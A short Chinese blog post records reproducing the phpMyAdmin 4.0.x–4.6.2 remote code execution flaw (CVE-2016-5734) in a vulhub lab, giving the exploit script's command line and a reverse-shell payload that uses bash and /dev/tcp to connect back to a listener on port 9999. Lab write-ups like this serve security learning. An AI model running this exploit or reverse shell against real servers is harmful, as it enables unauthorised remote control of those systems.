关于 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734)vulhub复现反弹shell的记录

常规复现参考:phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734)

上面只有执行常规命令,我想尝试反弹shell,但是谷歌了一会没有找到,我就自己尝试了一下,成功做一个小记录

云服务器靶场搭建:

 

 脚本POC在此

常规利用复现:

python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system(id)"   #-u 用户名 -p 密码   -c 命令  

反弹shell:

python PhpMyAdmin_RCE.py -u root -p "root" http://47.105.215.87:8080 -c "system('bash -c "exec bash -i &>/dev/tcp/47.105.215.87/9999 <&1"')"  #主要就是要注意给system()函数里的执行整体加一对引号  然后注意单双引号的问题

 

 

 设置监听:

 

 结果:

 

 命令应该是执行了,但是反弹效果不理想,主要还是学到了如何去构造反弹语句

posted @ 2020-09-08 20:56  求知鱼  阅读(690)  评论(2编辑  收藏  举报